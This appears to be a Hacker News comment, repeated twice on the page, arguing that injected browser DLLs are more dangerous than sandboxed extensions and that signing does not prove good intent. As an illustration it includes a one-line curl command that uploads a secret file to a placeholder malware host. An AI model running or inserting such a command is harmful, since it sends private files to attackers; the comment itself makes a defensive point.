Injecting a DLL in the browser implies code running with the browser's permissions, which means the DLL will be able to access everything on your system. For example `system("curl https://malware.com -F@/etc/secret-file")` will be possible. Another example is that it could also see all your saved passwords.
A javascript extension cannot do that. It is sandboxed and is bound to a permission system limiting what it can do on top of that.
Signing a DLL only proves that the author is who he says he is. Not that his intentions are good. Same for browser extensions.
So it's best to limit what the extension can do to begin with.
alt Hacker News
Injecting a DLL in the browser implies code running with the browser's permissions, which means the DLL will be able to access everything on your system. For example `system("curl https://malware.com -F@/etc/secret-file")` will be possible. Another example is that it could also see all your saved passwords.
A javascript extension cannot do that. It is sandboxed and is bound to a permission system limiting what it can do on top of that.
Signing a DLL only proves that the author is who he says he is. Not that his intentions are good. Same for browser extensions.
So it's best to limit what the extension can do to begin with.